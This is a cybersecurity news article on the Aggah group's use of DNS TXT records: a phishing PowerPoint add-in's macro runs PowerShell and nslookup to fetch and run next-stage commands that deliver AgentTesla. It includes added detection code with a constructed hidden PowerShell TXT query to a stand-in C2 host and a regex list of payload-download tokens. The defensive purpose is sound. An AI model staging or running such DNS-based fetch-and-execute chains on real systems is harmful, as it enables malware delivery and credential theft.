Cyber Security News

DNS TXT Records Can Be Used by Hackers to Execute Malware

A DNS TXT record lets a domain administrator store free-form text in DNS. It was originally intended for human-readable notes, but today it is used for a variety of purposes, including:

  • Spam prevention
  • Domain ownership verification

Spam senders disguise the domain they send from to evade detection; receiving mail servers counter this by validating incoming email against the sender domain's DNS TXT record, which makes the TXT record a key element of that check.

Similarly, domain owners can prove ownership of a domain by publishing a TXT record that contains a specific value, or by adding that value to an existing record.
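To make the two legitimate uses above concrete, here is a small added example (not code from the article or from AhnLab) that evaluates the ip4/ip6 and "all" mechanisms of an SPF record and checks for a domain-verification token. The zone names, IP ranges and the token value are constructed sample data; SPF mechanisms that need further DNS lookups (include, a, mx, redirect) are deliberately skipped so the example runs offline.

```python
import ipaddress

# Constructed sample TXT records for made-up zones (not any real domain's data).
SAMPLE_TXT = {
    "example.test": [
        "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.7 ip6:2001:db8::/32 -all",
        "example-site-verification=abc123",
    ],
    "no-spf.test": [
        "just a human-readable note",
    ],
}

# SPF qualifier characters and the results they map to.
QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(txt_records):
    """Return the mechanism list of the first v=spf1 record, or None."""
    for rec in txt_records:
        if rec.lower().startswith("v=spf1"):
            return rec.split()[1:]
    return None


def spf_check(txt_records, sender_ip):
    """Evaluate ip4/ip6 mechanisms and the trailing 'all' for a sender IP.

    Returns 'pass', 'fail', 'softfail', 'neutral' or 'none' (no SPF record).
    Mechanisms that need further DNS lookups (include, a, mx, redirect) are
    out of scope for this offline example and are skipped.
    """
    mechs = parse_spf(txt_records)
    if mechs is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for mech in mechs:
        qualifier = "+"  # an unqualified mechanism means '+'
        if mech[0] in QUALIFIER:
            qualifier, mech = mech[0], mech[1:]
        if mech.startswith(("ip4:", "ip6:")):
            net = ipaddress.ip_network(mech.split(":", 1)[1], strict=False)
            if ip.version == net.version and ip in net:
                return QUALIFIER[qualifier]
        elif mech == "all":
            return QUALIFIER[qualifier]
    return "neutral"  # no mechanism matched and no 'all' present


def has_verification_token(txt_records, prefix, expected):
    """Domain-ownership proof: the zone must publish exactly prefix + expected."""
    return any(rec == prefix + expected for rec in txt_records)


if __name__ == "__main__":
    for ip in ("192.0.2.55", "198.51.100.7", "2001:db8::1", "203.0.113.9"):
        print(ip, spf_check(SAMPLE_TXT["example.test"], ip))
    print(has_verification_token(SAMPLE_TXT["example.test"],
                                 "example-site-verification=", "abc123"))
```

A real SPF evaluator follows the include and redirect chains with their own lookups and enforces the ten-lookup limit; the point here is only that the receiving server's decision hinges on text it reads from the domain's TXT record.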

AhnLab's ASEC has confirmed that DNS TXT records were used to execute malware, a rare technique that matters for detection and analysis.

Malware Execution using DNS TXT Records

The malware uses DNS TXT records differently from the common uses described above, in a way that is closer to the record's original purpose of storing DNS-related text.

A malicious PPAM file attachment in Phishing email (Source – AhnLab)

The phishing email posed as an "Order Inquiry" and carried a PowerPoint add-in (PPAM) file. PPAM files can contain user-defined macros and VBA code; when the PowerPoint macro was executed, it launched PowerShell, which in turn ran the nslookup command-line tool.

Macro code in the PPAM file (Source – AhnLab)

The macro code inside the PPAM file is simple: when run, it starts PowerShell and uses nslookup to query a DNS TXT record. The threat actor had placed the command for the next stage inside that TXT record.

The threat actor's repeated use of child processes suggests an attempt to evade anti-malware solutions and similar products.

Examining the DNS TXT records of the threat actor's server (abena-dk[.]cam) reveals unusual data that deviates from the typical purposes of a TXT record.

The records suggest that the threat actor experimented with several subdomains, tested execution by launching the calculator (calc.exe), and used VBScript (.vbs) files instead of JavaScript (.js) files.

nslookup result of the various subdomains (Source – AhnLab)

The threat actor used a little-seen method: storing PowerShell commands in their DNS TXT record so that they are executed once retrieved by an nslookup query.

This differs from the traditional practice of writing PowerShell commands directly in the macro code, yet it still allowed the malware to execute.

The PowerShell command fetches methewPayload.js from a URL, saves it as meth.js and executes it with wscript.exe; that script then downloads a Base64-encoded DLL binary from an external URL.
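The execution chain described above (Office macro, then PowerShell, then nslookup for a TXT record) leaves a distinctive parent-child trail in process-creation telemetry, and the TXT answer itself carries script text that legitimate records never contain. The following is an added detection example written for this article; it is not code from AhnLab or from the article. The process events are constructed in a Sysmon-like shape with made-up PIDs, and the domain and file names are placeholders, not the real indicators.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
# The domain and document name are made-up placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "POWERPNT.EXE",
     "cmdline": "POWERPNT.EXE Order_Inquiry.ppam"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden nslookup -q=txt lookup.txt-c2.example"},
    {"pid": 400, "ppid": 300, "image": "nslookup.exe",
     "cmdline": "nslookup -q=txt lookup.txt-c2.example"},
    # Benign: an administrator querying a TXT record from an interactive shell.
    {"pid": 500, "ppid": 100, "image": "cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": "nslookup.exe",
     "cmdline": "nslookup -type=txt example.test"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
TXT_QUERY = re.compile(r"(?i)-(?:q|querytype|type)=txt\b")

# Tokens that have no place in a legitimate TXT record (SPF, DKIM, verification tokens).
SUSPICIOUS_TXT = re.compile(
    r"(?i)\b(powershell|pwsh|iex|invoke-expression|wscript|cscript|mshta|"
    r"frombase64string|downloadstring|downloadfile|cmd\.exe)\b")


def lineage(by_pid, pid):
    """Image names from the given process up to the root, lowercased."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # 'seen' guards against PID reuse loops
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect_txt_lookup_chain(events):
    """Flag nslookup TXT queries whose ancestry contains both an Office
    application and a script host, i.e. the macro -> PowerShell -> nslookup
    pattern described in the article. Returns a list of (pid, lineage)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() != "nslookup.exe":
            continue
        if not TXT_QUERY.search(e["cmdline"]):
            continue
        chain = lineage(by_pid, e["pid"])
        if OFFICE_APPS & set(chain) and SCRIPT_HOSTS & set(chain):
            hits.append((e["pid"], chain))
    return hits


def txt_record_is_suspicious(txt):
    """Content check for TXT answers seen in DNS server logs or passive DNS."""
    return bool(SUSPICIOUS_TXT.search(txt))


if __name__ == "__main__":
    for pid, chain in detect_txt_lookup_chain(EVENTS):
        print(f"suspicious TXT lookup pid={pid} lineage={' <- '.join(chain)}")
    # Constructed TXT answers: a normal SPF record and a script-laden one.
    for rec in ("v=spf1 ip4:192.0.2.0/24 -all",
                "powershell.exe -w hidden IEX (constructed payload text)"):
        print(txt_record_is_suspicious(rec), rec)
```

The process-lineage rule is the more robust of the two, because it does not depend on the attacker's wording: any TXT lookup descended from an Office process through a script host is abnormal on a workstation. The content rule complements it on the DNS side, where a resolver log or passive-DNS feed shows the answers even when endpoint telemetry is missing.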

This malware is not new: it originates from the hacking group Hagga (also known as Aggah) and has been circulating since late 2021.

Based on TTP analysis, the threat actor employed various methods, including:

  • Distributing documents with malicious macros
  • Using characteristic .NET code elements
  • Employing the StrReverse function
  • Downloading additional malicious files
  • Executing additional malicious files

The downloaded file was identified as AgentTesla, a .NET-based infostealer.


Tushar Subhra Dutta

Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.
